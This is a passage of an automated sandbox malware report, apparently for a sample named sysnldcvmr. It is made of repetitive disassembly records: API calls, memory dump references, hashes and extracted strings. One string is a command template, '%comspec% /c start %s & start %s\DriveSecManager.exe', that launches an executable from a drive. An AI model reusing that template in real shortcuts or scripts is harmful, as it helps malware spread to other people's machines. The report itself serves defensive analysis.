                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                                                                                                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                                                                                                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                                                                                                                                                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                                                                                                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                    • Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                                                                                                                                                    • Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                                                                                                                                    • Opcode ID: 9b4aaea4de293e7613797dc8819211a47175aa23b786492405d8e261baea7983
                                                                                                                                                                                                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b4aaea4de293e7613797dc8819211a47175aa23b786492405d8e261baea7983
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                                                                                                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040646B
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004064B6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • %comspec%, xrefs: 004064BF
                                                                                                                                                                                                                                                    • /c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                    • String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
                                                                                                                                                                                                                                                    • API String ID: 2038452267-3640840557
                                                                                                                                                                                                                                                    • Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                                                                                                                                                    • Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(009D0634), ref: 0040D429
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(009D0638), ref: 0040D458
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(009D0634), ref: 0040D467
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(009D0634), ref: 0040D474
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3102160386-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
                                                                                                                                                                                                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07dc70c68ac7b0d2cc494817546f3db23909211f8ba204667fa5a7f367d8b6f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                      • Part of subcall function 0040A1B0: RtlFreeHeap.NTDLL(009D0000,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                    • String ID: pdu$.ou
                                                                                                                                                                                                                                                    • API String ID: 309973729-2706015961
                                                                                                                                                                                                                                                    • Opcode ID: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
                                                                                                                                                                                                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa896684b321fe836e516ce056a9b06d37fd724aa26af72c169520ae3e67de3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3966618661-0
                                                                                                                                                                                                                                                    • Opcode ID: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
                                                                                                                                                                                                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ff310e7853ca029222ff4769d80b5f1c3030ef883704326f7d9456a7b5fb0ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                                                                                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                                                                                                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 2064604595-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
                                                                                                                                                                                                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ba0acdde54fd6a1846075b770b5d55397f96483b8af1252066fbfcfee1e69d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
